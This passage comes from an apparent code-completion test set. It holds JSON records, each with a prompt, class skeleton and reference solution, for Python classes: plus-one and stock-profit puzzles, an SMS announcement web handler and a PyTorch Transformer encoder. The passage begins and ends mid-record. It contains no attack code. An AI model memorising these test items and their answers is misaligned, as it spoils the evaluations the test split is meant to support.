class.\n\nMethod signatures and docstrings:\n- def plusOne(self, digits): :type digits: List[int] :rtype: List[int] 正序计算\n- def plusOne2(self, digits): :type digits: List[int] :rtype: List[int] 反转数组,从左往右计算 反转后第一位+1小于10,则+1即可退出循环 反转后第一位+1=10,则当前位=0,继续循环;最后一位时直接=0且最后增加一位1\n- def plusOne3(self, digits): :type digits: List[int] :rtype: List[int] 类型转换的方法\n\n<|skeleton|>\nclass Solution:\n\n def plusOne(self, digits):\n \"\"\":type digits: List[int] :rtype: List[int] 正序计算\"\"\"\n <|body_0|>\n\n def plusOne2(self, digits):\n \"\"\":type digits: List[int] :rtype: List[int] 反转数组,从左往右计算 反转后第一位+1小于10,则+1即可退出循环 反转后第一位+1=10,则当前位=0,继续循环;最后一位时直接=0且最后增加一位1\"\"\"\n <|body_1|>\n\n def plusOne3(self, digits):\n \"\"\":type digits: List[int] :rtype: List[int] 类型转换的方法\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n digits = digits[::-1]\n print(digits)\n l = len(digits)\n p = l - 1\n f = False\n while p >= 0:\n if digits[p] != 9:\n digits[p] += 1\n if f == True or p == l - 1:\n return digits\n else:\n f = True\n digits[p] = 0\n p -= 1\n if p == -1:\n digits.insert(0, 1)\n return digits\n<|end_body_0|>\n\n<|body_start_1|>\n length = len(digits)\n digits = digits[::-1]\n for i in range(length):\n if digits[i] + 1 < 10:\n digits[i] = digits[i] + 1\n break\n elif i != length - 1:\n digits[i] = 0\n else:\n digits[i] = 0\n digits.append(1)\n digits = digits[::-1]\n return digits\n<|end_body_1|>\n\n<|body_start_2|>\n s = ''\n for i in digits:\n s += str(i)\n s = int(s)\n s += 1\n s = str(s)\n digits = []\n for i in s:\n digits.append(int(i))\n return digits\n<|end_body_2|>\n", "revision_id": "b0f498ebe84e46b7e17e94759dd462891dcc8f85", "skeleton": "<|skeleton|>\nclass Solution:\n\n def plusOne(self, digits):\n \"\"\":type digits: List[int] :rtype: List[int] 正序计算\"\"\"\n <|body_0|>\n\n def plusOne2(self, digits):\n \"\"\":type digits: List[int] :rtype: List[int] 反转数组,从左往右计算 反转后第一位+1小于10,则+1即可退出循环 反转后第一位+1=10,则当前位=0,继续循环;最后一位时直接=0且最后增加一位1\"\"\"\n <|body_1|>\n\n def plusOne3(self, digits):\n \"\"\":type digits: List[int] :rtype: List[int] 类型转换的方法\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def plusOne(self, digits):\n \"\"\":type digits: List[int] :rtype: List[int] 正序计算\"\"\"\n digits = digits[::-1]\n print(digits)\n l = len(digits)\n p = l - 1\n f = False\n while p >= 0:\n if digits[p] != 9:\n digits[p] += 1\n if f == True or p == l - 1:\n return digits\n else:\n f = True\n digits[p] = 0\n p -= 1\n if p == -1:\n digits.insert(0, 1)\n return digits\n\n def plusOne2(self, digits):\n \"\"\":type digits: List[int] :rtype: List[int] 反转数组,从左往右计算 反转后第一位+1小于10,则+1即可退出循环 反转后第一位+1=10,则当前位=0,继续循环;最后一位时直接=0且最后增加一位1\"\"\"\n length = len(digits)\n digits = digits[::-1]\n for i in range(length):\n if digits[i] + 1 < 10:\n digits[i] = digits[i] + 1\n break\n elif i != length - 1:\n digits[i] = 0\n else:\n digits[i] = 0\n digits.append(1)\n digits = digits[::-1]\n return digits\n\n def plusOne3(self, digits):\n \"\"\":type digits: List[int] :rtype: List[int] 类型转换的方法\"\"\"\n s = ''\n for i in digits:\n s += str(i)\n s = int(s)\n s += 1\n s = str(s)\n digits = []\n for i in s:\n digits.append(int(i))\n return digits\n", "source": "the_stack_v2_python_sparse", "source_path": "初级算法/array_7.py", "source_repo": "wulinlw/leetcode_cn", "split": "test", "star_events_count": 0} {"blob_id": "93d76a916b7824060a84f863b33a73ac503767fe", "bodies": ["if not prices:\n return 0\npre = 0\nopt_profit = 0\nfor i in range(1, len(prices)):\n pre = max(pre + (prices[i] - prices[i - 1]), 0)\n opt_profit = max(opt_profit, pre)\nreturn opt_profit", "if not prices:\n return 0\nmin_price = float('inf')\nopt = 0\nfor price in prices:\n min_price = min(price, min_price)\n opt = max(opt, price - min_price)\nreturn opt"], "bodies_text": "<|body_start_0|>\n if not prices:\n return 0\n pre = 0\n opt_profit = 0\n for i in range(1, len(prices)):\n pre = max(pre + (prices[i] - prices[i - 1]), 0)\n opt_profit = max(opt_profit, pre)\n return opt_profit\n<|end_body_0|>\n\n<|body_start_1|>\n if not prices:\n return 0\n min_price = float('inf')\n opt = 0\n for price in prices:\n min_price = min(price, min_price)\n opt = max(opt, price - min_price)\n return opt\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def max_profit(self, prices):\n \"\"\"The meaning of dp[i] is the maximum profit of selling the stock at i-th day. And the stock has to be bought on or before that day. dp[i+1] is max(dp[i] + (prices[i+1] - prices[i]), 0). This is because the sell day is fixed and bought day must be the same as bought day of dp[i]. However, if this value is less than zero, we would rather buy and sell on the (i+1)-th day, to make the profit equal to 1.\"\"\"\n <|body_0|>\n\n def max_profit_min_price(self, prices):\n \"\"\"The idea is to maintain the min_price and max_profit, the update rule for max_profit is max(max_profit, current_price - min_price)\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if not prices:\n return 0\n pre = 0\n opt_profit = 0\n for i in range(1, len(prices)):\n pre = max(pre + (prices[i] - prices[i - 1]), 0)\n opt_profit = max(opt_profit, pre)\n return opt_profit\n<|end_body_0|>\n\n<|body_start_1|>\n if not prices:\n return 0\n min_price = float('inf')\n opt = 0\n for price in prices:\n min_price = min(price, min_price)\n opt = max(opt, price - min_price)\n return opt\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000267", "length_bytes": 1473, "license_type": "no_license", "methods": [{"docstring": "The meaning of dp[i] is the maximum profit of selling the stock at i-th day. And the stock has to be bought on or before that day. dp[i+1] is max(dp[i] + (prices[i+1] - prices[i]), 0). This is because the sell day is fixed and bought day must be the same as bought day of dp[i]. However, if this value is less than zero, we would rather buy and sell on the (i+1)-th day, to make the profit equal to 1.", "name": "max_profit", "signature": "def max_profit(self, prices)"}, {"docstring": "The idea is to maintain the min_price and max_profit, the update rule for max_profit is max(max_profit, current_price - min_price)", "name": "max_profit_min_price", "signature": "def max_profit_min_price(self, prices)"}], "n_methods": 2, "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def max_profit(self, prices): The meaning of dp[i] is the maximum profit of selling the stock at i-th day. And the stock has to be bought on or before that day. dp[i+1] is max(dp[i] + (prices[i+1] - prices[i]), 0). This is because the sell day is fixed and bought day must be the same as bought day of dp[i]. However, if this value is less than zero, we would rather buy and sell on the (i+1)-th day, to make the profit equal to 1.\n- def max_profit_min_price(self, prices): The idea is to maintain the min_price and max_profit, the update rule for max_profit is max(max_profit, current_price - min_price)", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def max_profit(self, prices): The meaning of dp[i] is the maximum profit of selling the stock at i-th day. And the stock has to be bought on or before that day. dp[i+1] is max(dp[i] + (prices[i+1] - prices[i]), 0). This is because the sell day is fixed and bought day must be the same as bought day of dp[i]. However, if this value is less than zero, we would rather buy and sell on the (i+1)-th day, to make the profit equal to 1.\n- def max_profit_min_price(self, prices): The idea is to maintain the min_price and max_profit, the update rule for max_profit is max(max_profit, current_price - min_price)\n\n<|skeleton|>\nclass Solution:\n\n def max_profit(self, prices):\n \"\"\"The meaning of dp[i] is the maximum profit of selling the stock at i-th day. And the stock has to be bought on or before that day. dp[i+1] is max(dp[i] + (prices[i+1] - prices[i]), 0). This is because the sell day is fixed and bought day must be the same as bought day of dp[i]. However, if this value is less than zero, we would rather buy and sell on the (i+1)-th day, to make the profit equal to 1.\"\"\"\n <|body_0|>\n\n def max_profit_min_price(self, prices):\n \"\"\"The idea is to maintain the min_price and max_profit, the update rule for max_profit is max(max_profit, current_price - min_price)\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if not prices:\n return 0\n pre = 0\n opt_profit = 0\n for i in range(1, len(prices)):\n pre = max(pre + (prices[i] - prices[i - 1]), 0)\n opt_profit = max(opt_profit, pre)\n return opt_profit\n<|end_body_0|>\n\n<|body_start_1|>\n if not prices:\n return 0\n min_price = float('inf')\n opt = 0\n for price in prices:\n min_price = min(price, min_price)\n opt = max(opt, price - min_price)\n return opt\n<|end_body_1|>\n", "revision_id": "5625e6396b746255f3343253c75447ead95879c7", "skeleton": "<|skeleton|>\nclass Solution:\n\n def max_profit(self, prices):\n \"\"\"The meaning of dp[i] is the maximum profit of selling the stock at i-th day. And the stock has to be bought on or before that day. dp[i+1] is max(dp[i] + (prices[i+1] - prices[i]), 0). This is because the sell day is fixed and bought day must be the same as bought day of dp[i]. However, if this value is less than zero, we would rather buy and sell on the (i+1)-th day, to make the profit equal to 1.\"\"\"\n <|body_0|>\n\n def max_profit_min_price(self, prices):\n \"\"\"The idea is to maintain the min_price and max_profit, the update rule for max_profit is max(max_profit, current_price - min_price)\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def max_profit(self, prices):\n \"\"\"The meaning of dp[i] is the maximum profit of selling the stock at i-th day. And the stock has to be bought on or before that day. dp[i+1] is max(dp[i] + (prices[i+1] - prices[i]), 0). This is because the sell day is fixed and bought day must be the same as bought day of dp[i]. However, if this value is less than zero, we would rather buy and sell on the (i+1)-th day, to make the profit equal to 1.\"\"\"\n if not prices:\n return 0\n pre = 0\n opt_profit = 0\n for i in range(1, len(prices)):\n pre = max(pre + (prices[i] - prices[i - 1]), 0)\n opt_profit = max(opt_profit, pre)\n return opt_profit\n\n def max_profit_min_price(self, prices):\n \"\"\"The idea is to maintain the min_price and max_profit, the update rule for max_profit is max(max_profit, current_price - min_price)\"\"\"\n if not prices:\n return 0\n min_price = float('inf')\n opt = 0\n for price in prices:\n min_price = min(price, min_price)\n opt = max(opt, price - min_price)\n return opt\n", "source": "the_stack_v2_python_sparse", "source_path": "121_best_time_to_buy_and_sell_stock/solution.py", "source_repo": "FluffyFu/Leetcode", "split": "test", "star_events_count": 0} {"blob_id": "b1e4ed4478ff182dfe54a677c76f41ebe36c829e", "bodies": ["status = ErrorCode.SUCCESS\ntry:\n data = DotDict(json_decode(self.request.body))\n content = data.get('content', '')\n mobiles = data.get('mobiles', None)\n logging.info('[UWEB] Announcement request: %s', data)\nexcept Exception as e:\n status = ErrorCode.ILLEGAL_DATA_FORMAT\n self.write_ret(status)\n return\ntry:\n mobiles_ = u''\n if mobiles is not None:\n mobiles_ = ','.join(mobiles)\n for mobile in mobiles:\n SMSHelper.send(mobile, content)\n announcement = dict(cid=self.current_user.cid, content=content, mobiles=mobiles_)\n record_announcement(self.db, announcement)\n self.write_ret(status)\nexcept Exception as e:\n status = ErrorCode.SERVER_BUSY\n logging.exception('[UWEB] record share failed, Exception: %s', e.args)\n self.write_ret(status)", "status = ErrorCode.SUCCESS\ntry:\n delete_ids = map(int, str_to_list(self.get_argument('ids', None)))\n logging.info('[UWEB] Delete announcement: %s', delete_ids)\nexcept Exception as e:\n status = ErrorCode.ILLEGAL_DATA_FORMAT\n logging.exception('[UWEB] data format illegal. Exception: %s', e.args)\n self.write_ret(status)\n return\ntry:\n self.db.execute('DELETE FROM T_ANNOUNCEMENT_LOG WHERE id IN %s', tuple(delete_ids + DUMMY_IDS))\n self.write_ret(status)\nexcept Exception as e:\n status = ErrorCode.SERVER_BUSY\n logging.exception('[UWEB] Delete announcement failed. Exception: %s', e.args)\n self.write_ret(status)"], "bodies_text": "<|body_start_0|>\n status = ErrorCode.SUCCESS\n try:\n data = DotDict(json_decode(self.request.body))\n content = data.get('content', '')\n mobiles = data.get('mobiles', None)\n logging.info('[UWEB] Announcement request: %s', data)\n except Exception as e:\n status = ErrorCode.ILLEGAL_DATA_FORMAT\n self.write_ret(status)\n return\n try:\n mobiles_ = u''\n if mobiles is not None:\n mobiles_ = ','.join(mobiles)\n for mobile in mobiles:\n SMSHelper.send(mobile, content)\n announcement = dict(cid=self.current_user.cid, content=content, mobiles=mobiles_)\n record_announcement(self.db, announcement)\n self.write_ret(status)\n except Exception as e:\n status = ErrorCode.SERVER_BUSY\n logging.exception('[UWEB] record share failed, Exception: %s', e.args)\n self.write_ret(status)\n<|end_body_0|>\n\n<|body_start_1|>\n status = ErrorCode.SUCCESS\n try:\n delete_ids = map(int, str_to_list(self.get_argument('ids', None)))\n logging.info('[UWEB] Delete announcement: %s', delete_ids)\n except Exception as e:\n status = ErrorCode.ILLEGAL_DATA_FORMAT\n logging.exception('[UWEB] data format illegal. Exception: %s', e.args)\n self.write_ret(status)\n return\n try:\n self.db.execute('DELETE FROM T_ANNOUNCEMENT_LOG WHERE id IN %s', tuple(delete_ids + DUMMY_IDS))\n self.write_ret(status)\n except Exception as e:\n status = ErrorCode.SERVER_BUSY\n logging.exception('[UWEB] Delete announcement failed. Exception: %s', e.args)\n self.write_ret(status)\n<|end_body_1|>\n", "class_docstring": "Record the announcement info. :url /announcement", "class_name": "AnnouncementHandler", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass AnnouncementHandler:\n \"\"\"Record the announcement info. :url /announcement\"\"\"\n\n def post(self):\n \"\"\"Insert new items.\"\"\"\n <|body_0|>\n\n def delete(self):\n \"\"\"Delete announcement.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n status = ErrorCode.SUCCESS\n try:\n data = DotDict(json_decode(self.request.body))\n content = data.get('content', '')\n mobiles = data.get('mobiles', None)\n logging.info('[UWEB] Announcement request: %s', data)\n except Exception as e:\n status = ErrorCode.ILLEGAL_DATA_FORMAT\n self.write_ret(status)\n return\n try:\n mobiles_ = u''\n if mobiles is not None:\n mobiles_ = ','.join(mobiles)\n for mobile in mobiles:\n SMSHelper.send(mobile, content)\n announcement = dict(cid=self.current_user.cid, content=content, mobiles=mobiles_)\n record_announcement(self.db, announcement)\n self.write_ret(status)\n except Exception as e:\n status = ErrorCode.SERVER_BUSY\n logging.exception('[UWEB] record share failed, Exception: %s', e.args)\n self.write_ret(status)\n<|end_body_0|>\n\n<|body_start_1|>\n status = ErrorCode.SUCCESS\n try:\n delete_ids = map(int, str_to_list(self.get_argument('ids', None)))\n logging.info('[UWEB] Delete announcement: %s', delete_ids)\n except Exception as e:\n status = ErrorCode.ILLEGAL_DATA_FORMAT\n logging.exception('[UWEB] data format illegal. Exception: %s', e.args)\n self.write_ret(status)\n return\n try:\n self.db.execute('DELETE FROM T_ANNOUNCEMENT_LOG WHERE id IN %s', tuple(delete_ids + DUMMY_IDS))\n self.write_ret(status)\n except Exception as e:\n status = ErrorCode.SERVER_BUSY\n logging.exception('[UWEB] Delete announcement failed. Exception: %s', e.args)\n self.write_ret(status)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000268", "length_bytes": 4433, "license_type": "no_license", "methods": [{"docstring": "Insert new items.", "name": "post", "signature": "def post(self)"}, {"docstring": "Delete announcement.", "name": "delete", "signature": "def delete(self)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_001821", "prompt": "Implement the Python class `AnnouncementHandler` described below.\n\nClass description:\nRecord the announcement info. :url /announcement\n\nMethod signatures and docstrings:\n- def post(self): Insert new items.\n- def delete(self): Delete announcement.", "prompted_full_text": "Implement the Python class `AnnouncementHandler` described below.\n\nClass description:\nRecord the announcement info. :url /announcement\n\nMethod signatures and docstrings:\n- def post(self): Insert new items.\n- def delete(self): Delete announcement.\n\n<|skeleton|>\nclass AnnouncementHandler:\n \"\"\"Record the announcement info. :url /announcement\"\"\"\n\n def post(self):\n \"\"\"Insert new items.\"\"\"\n <|body_0|>\n\n def delete(self):\n \"\"\"Delete announcement.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n status = ErrorCode.SUCCESS\n try:\n data = DotDict(json_decode(self.request.body))\n content = data.get('content', '')\n mobiles = data.get('mobiles', None)\n logging.info('[UWEB] Announcement request: %s', data)\n except Exception as e:\n status = ErrorCode.ILLEGAL_DATA_FORMAT\n self.write_ret(status)\n return\n try:\n mobiles_ = u''\n if mobiles is not None:\n mobiles_ = ','.join(mobiles)\n for mobile in mobiles:\n SMSHelper.send(mobile, content)\n announcement = dict(cid=self.current_user.cid, content=content, mobiles=mobiles_)\n record_announcement(self.db, announcement)\n self.write_ret(status)\n except Exception as e:\n status = ErrorCode.SERVER_BUSY\n logging.exception('[UWEB] record share failed, Exception: %s', e.args)\n self.write_ret(status)\n<|end_body_0|>\n\n<|body_start_1|>\n status = ErrorCode.SUCCESS\n try:\n delete_ids = map(int, str_to_list(self.get_argument('ids', None)))\n logging.info('[UWEB] Delete announcement: %s', delete_ids)\n except Exception as e:\n status = ErrorCode.ILLEGAL_DATA_FORMAT\n logging.exception('[UWEB] data format illegal. Exception: %s', e.args)\n self.write_ret(status)\n return\n try:\n self.db.execute('DELETE FROM T_ANNOUNCEMENT_LOG WHERE id IN %s', tuple(delete_ids + DUMMY_IDS))\n self.write_ret(status)\n except Exception as e:\n status = ErrorCode.SERVER_BUSY\n logging.exception('[UWEB] Delete announcement failed. Exception: %s', e.args)\n self.write_ret(status)\n<|end_body_1|>\n", "revision_id": "3b095a325581b1fc48497c234f0ad55e928586a1", "skeleton": "<|skeleton|>\nclass AnnouncementHandler:\n \"\"\"Record the announcement info. :url /announcement\"\"\"\n\n def post(self):\n \"\"\"Insert new items.\"\"\"\n <|body_0|>\n\n def delete(self):\n \"\"\"Delete announcement.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class AnnouncementHandler:\n \"\"\"Record the announcement info. :url /announcement\"\"\"\n\n def post(self):\n \"\"\"Insert new items.\"\"\"\n status = ErrorCode.SUCCESS\n try:\n data = DotDict(json_decode(self.request.body))\n content = data.get('content', '')\n mobiles = data.get('mobiles', None)\n logging.info('[UWEB] Announcement request: %s', data)\n except Exception as e:\n status = ErrorCode.ILLEGAL_DATA_FORMAT\n self.write_ret(status)\n return\n try:\n mobiles_ = u''\n if mobiles is not None:\n mobiles_ = ','.join(mobiles)\n for mobile in mobiles:\n SMSHelper.send(mobile, content)\n announcement = dict(cid=self.current_user.cid, content=content, mobiles=mobiles_)\n record_announcement(self.db, announcement)\n self.write_ret(status)\n except Exception as e:\n status = ErrorCode.SERVER_BUSY\n logging.exception('[UWEB] record share failed, Exception: %s', e.args)\n self.write_ret(status)\n\n def delete(self):\n \"\"\"Delete announcement.\"\"\"\n status = ErrorCode.SUCCESS\n try:\n delete_ids = map(int, str_to_list(self.get_argument('ids', None)))\n logging.info('[UWEB] Delete announcement: %s', delete_ids)\n except Exception as e:\n status = ErrorCode.ILLEGAL_DATA_FORMAT\n logging.exception('[UWEB] data format illegal. Exception: %s', e.args)\n self.write_ret(status)\n return\n try:\n self.db.execute('DELETE FROM T_ANNOUNCEMENT_LOG WHERE id IN %s', tuple(delete_ids + DUMMY_IDS))\n self.write_ret(status)\n except Exception as e:\n status = ErrorCode.SERVER_BUSY\n logging.exception('[UWEB] Delete announcement failed. Exception: %s', e.args)\n self.write_ret(status)\n", "source": "the_stack_v2_python_sparse", "source_path": "apps/uweb/handlers/announcement.py", "source_repo": "jcsy521/ydws", "split": "test", "star_events_count": 0} {"blob_id": "74bce0dbec2c1a92c40a962f3a099097be735c96", "bodies": ["super().__init__()\nself.input_size = input_size\nself.d_model = d_model\nif input_size != d_model:\n self.proj = nn.Linear(input_size, d_model)\nlayer = TransformerEncoderLayer(d_model, nhead, dim_feedforward, dropout)\nself.layers = nn.ModuleList([copy.deepcopy(layer) for _ in range(num_layers)])\nself.num_layers = num_layers\nself._reset_parameters()", "output = src.transpose(0, 1)\nif self.input_size != self.d_model:\n output = self.proj(output)\nfor i in range(self.num_layers):\n output = self.layers[i](output, memory=memory, src_mask=mask, padding_mask=padding_mask)\nreturn output.transpose(0, 1)", "for p in self.parameters():\n if p.dim() > 1:\n nn.init.xavier_uniform_(p)"], "bodies_text": "<|body_start_0|>\n super().__init__()\n self.input_size = input_size\n self.d_model = d_model\n if input_size != d_model:\n self.proj = nn.Linear(input_size, d_model)\n layer = TransformerEncoderLayer(d_model, nhead, dim_feedforward, dropout)\n self.layers = nn.ModuleList([copy.deepcopy(layer) for _ in range(num_layers)])\n self.num_layers = num_layers\n self._reset_parameters()\n<|end_body_0|>\n\n<|body_start_1|>\n output = src.transpose(0, 1)\n if self.input_size != self.d_model:\n output = self.proj(output)\n for i in range(self.num_layers):\n output = self.layers[i](output, memory=memory, src_mask=mask, padding_mask=padding_mask)\n return output.transpose(0, 1)\n<|end_body_1|>\n\n<|body_start_2|>\n for p in self.parameters():\n if p.dim() > 1:\n nn.init.xavier_uniform_(p)\n<|end_body_2|>\n", "class_docstring": "TransformerEncoder is a stack of N encoder layers.", "class_name": "TransformerEncoder", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass TransformerEncoder:\n \"\"\"TransformerEncoder is a stack of N encoder layers.\"\"\"\n\n def __init__(self, input_size: int=512, d_model: int=512, nhead: int=8, num_layers: int=6, dim_feedforward: int=2048, dropout: float=0.1) -> None:\n \"\"\"Initialize the TransformerEncoder. Parameters --------- input_size : int The embedding dimension of the model. If different from d_model, a linear projection layer is added. d_model : int the number of expected features in encoder/decoder inputs. Default ``512``. nhead : int, optional the number of heads in the multiheadattention Default ``8``. num_layers : int the number of sub-encoder-layers in the encoder (required). Default ``6``. dim_feedforward : int, optional the inner feedforard dimension. Default ``2048``. dropout : float, optional the dropout percentage. Default ``0.1``.\"\"\"\n <|body_0|>\n\n def forward(self, src: torch.Tensor, memory: Optional[torch.Tensor]=None, mask: Optional[torch.Tensor]=None, padding_mask: Optional[torch.Tensor]=None) -> torch.Tensor:\n \"\"\"Pass the input through the endocder layers in turn. Parameters ---------- src: torch.Tensor The sequence to the encoder (required). memory: torch.Tensor, optional Optional memory, unused by default. mask: torch.Tensor, optional The mask for the src sequence (optional). padding_mask: torch.Tensor, optional The mask for the src keys per batch (optional). Should be True for tokens to leave untouched, and False for padding tokens.\"\"\"\n <|body_1|>\n\n def _reset_parameters(self):\n \"\"\"Initiate parameters in the transformer model.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super().__init__()\n self.input_size = input_size\n self.d_model = d_model\n if input_size != d_model:\n self.proj = nn.Linear(input_size, d_model)\n layer = TransformerEncoderLayer(d_model, nhead, dim_feedforward, dropout)\n self.layers = nn.ModuleList([copy.deepcopy(layer) for _ in range(num_layers)])\n self.num_layers = num_layers\n self._reset_parameters()\n<|end_body_0|>\n\n<|body_start_1|>\n output = src.transpose(0, 1)\n if self.input_size != self.d_model:\n output = self.proj(output)\n for i in range(self.num_layers):\n output = self.layers[i](output, memory=memory, src_mask=mask, padding_mask=padding_mask)\n return output.transpose(0, 1)\n<|end_body_1|>\n\n<|body_start_2|>\n for p in self.parameters():\n if p.dim() > 1:\n nn.init.xavier_uniform_(p)\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000269", "length_bytes": 20460, "license_type": "permissive", "methods": [{"docstring": "Initialize the TransformerEncoder. Parameters --------- input_size : int The embedding dimension of the model. If different from d_model, a linear projection layer is added. d_model : int the number of expected features in encoder/decoder inputs. Default ``512``. nhead : int, optional the number of heads in the multiheadattention Default ``8``. num_layers : int the number of sub-encoder-layers in the encoder (required). Default ``6``. dim_feedforward : int, optional the inner feedforard dimension. Default ``2048``. dropout : float, optional the dropout percentage. Default ``0.1``.", "name": "__init__", "signature": "def __init__(self, input_size: int=512, d_model: int=512, nhead: int=8, num_layers: int=6, dim_feedforward: int=2048, dropout: float=0.1) -> None"}, {"docstring": "Pass the input through the endocder layers in turn. Parameters ---------- src: torch.Tensor The sequence to the encoder (required). memory: torch.Tensor, optional Optional memory, unused by default. mask: torch.Tensor, optional The mask for the src sequence (optional). padding_mask: torch.Tensor, optional The mask for the src keys per batch (optional). Should be True for tokens to leave untouched, and False for padding tokens.", "name": "forward", "signature": "def forward(self, src: torch.Tensor, memory: Optional[torch.Tensor]=None, mask: Optional[torch.Tensor]=None, padding_mask: Optional[torch.Tensor]=None) -> torch.Tensor"}, {"docstring": "Initiate parameters in the transformer model.", "name": "_reset_parameters", "signature": "def _reset_parameters(self)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_006934", "prompt": "Implement the Python class `TransformerEncoder` described below.\n\nClass description:\nTransformerEncoder is a stack of N encoder layers.\n\nMethod signatures and docstrings:\n- def __init__(self, input_size: int=512, d_model: int=512, nhead: int=8, num_layers: int=6, dim_feedforward: int=2048, dropout: float=0.1) -> None: Initialize the TransformerEncoder. Parameters --------- input_size : int The embedding dimension of the model. If different from d_model, a linear projection layer is added. d_model : int the number of expected features in encoder/decoder inputs. Default ``512``. nhead : int, optional the number of heads in the multiheadattention Default ``8``. num_layers : int the number of sub-encoder-layers in the encoder (required). Default ``6``. dim_feedforward : int, optional the inner feedforard dimension. Default ``2048``. dropout : float, optional the dropout percentage. Default ``0.1``.\n- def forward(self, src: torch.Tensor, memory: Optional[torch.Tensor]=None, mask: Optional[torch.Tensor]=None, padding_mask: Optional[torch.Tensor]=None) -> torch.Tensor: Pass the input through the endocder layers in turn. Parameters ---------- src: torch.Tensor The sequence to the encoder (required). memory: torch.Tensor, optional Optional memory, unused by default. mask: torch.Tensor, optional The mask for the src sequence (optional). padding_mask: torch.Tensor, optional The mask for the src keys per batch (optional). Should be True for tokens to leave untouched, and False for padding tokens.\n- def _reset_parameters(self): Initiate parameters in the transformer model.", "prompted_full_text": "Implement the Python class `TransformerEncoder` described below.\n\nClass description:\nTransformerEncoder is a stack of N encoder layers.\n\nMethod signatures and docstrings:\n- def __init__(self, input_size: int=512, d_model: int=512, nhead: int=8, num_layers: int=6, dim_feedforward: int=2048, dropout: float=0.1) -> None: Initialize the TransformerEncoder. Parameters --------- input_size : int The embedding dimension of the model. If different from d_model, a linear projection layer is added. d_model : int the number of expected features in encoder/decoder inputs. Default ``512``. nhead : int, optional the number of heads in the multiheadattention Default ``8``. num_layers : int the number of sub-encoder-layers in the encoder (required). Default ``6``. dim_feedforward : int, optional the inner feedforard dimension. Default ``2048``. dropout : float, optional the dropout percentage. Default ``0.1``.\n- def forward(self, src: torch.Tensor, memory: Optional[torch.Tensor]=None, mask: Optional[torch.Tensor]=None, padding_mask: Optional[torch.Tensor]=None) -> torch.Tensor: Pass the input through the endocder layers in turn. Parameters ---------- src: torch.Tensor The sequence to the encoder (required). memory: torch.Tensor, optional Optional memory, unused by default. mask: torch.Tensor, optional The mask for the src sequence (optional). padding_mask: torch.Tensor, optional The mask for the src keys per batch (optional). Should be True for tokens to leave untouched, and False for padding tokens.\n- def _reset_parameters(self): Initiate parameters in the transformer model.\n\n<|skeleton|>\nclass TransformerEncoder:\n \"\"\"TransformerEncoder is a stack of N encoder layers.\"\"\"\n\n def __init__(self, input_size: int=512, d_model: int=512, nhead: int=8, num_layers: int=6, dim_feedforward: int=2048, dropout: float=0.1) -> None:\n \"\"\"Initialize the TransformerEncoder. Parameters --------- input_size : int The embedding dimension of the model. If different from d_model, a linear projection layer is added. d_model : int the number of expected features in encoder/decoder inputs. Default ``512``. nhead : int, optional the number of heads in the multiheadattention Default ``8``. num_layers : int the number of sub-encoder-layers in the encoder (required). Default ``6``. dim_feedforward : int, optional the inner feedforard dimension. Default ``2048``. dropout : float, optional the dropout percentage. Default ``0.1``.\"\"\"\n <|body_0|>\n\n def forward(self, src: torch.Tensor, memory: Optional[torch.Tensor]=None, mask: Optional[torch.Tensor]=None, padding_mask: Optional[torch.Tensor]=None) -> torch.Tensor:\n \"\"\"Pass the input through the endocder layers in turn. Parameters ---------- src: torch.Tensor The sequence to the encoder (required). memory: torch.Tensor, optional Optional memory, unused by default. mask: torch.Tensor, optional The mask for the src sequence (optional). padding_mask: torch.Tensor, optional The mask for the src keys per batch (optional). Should be True for tokens to leave untouched, and False for padding tokens.\"\"\"\n <|body_1|>\n\n def _reset_parameters(self):\n \"\"\"Initiate parameters in the transformer model.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super().__init__()\n self.input_size = input_size\n self.d_model = d_model\n if input_size != d_model:\n self.proj = nn.Linear(input_size, d_model)\n layer = TransformerEncoderLayer(d_model, nhead, dim_feedforward, dropout)\n self.layers = nn.ModuleList([copy.deepcopy(layer) for _ in range(num_layers)])\n self.num_layers = num_layers\n self._reset_parameters()\n<|end_body_0|>\n\n<|body_start_1|>\n output = src.transpose(0, 1)\n if self.input_size != self.d_model:\n output = self.proj(output)\n for i in range(self.num_layers):\n output = self.layers[i](output, memory=memory, src_mask=mask, padding_mask=padding_mask)\n return output.transpose(0, 1)\n<|end_body_1|>\n\n<|body_start_2|>\n for p in self.parameters():\n if p.dim() > 1:\n nn.init.xavier_uniform_(p)\n<|end_body_2|>\n", "revision_id": "0dc2f5b2b286694defe8abf450fe5be9ae12c097", "skeleton": "<|skeleton|>\nclass TransformerEncoder:\n \"\"\"TransformerEncoder is a stack of N encoder layers.\"\"\"\n\n 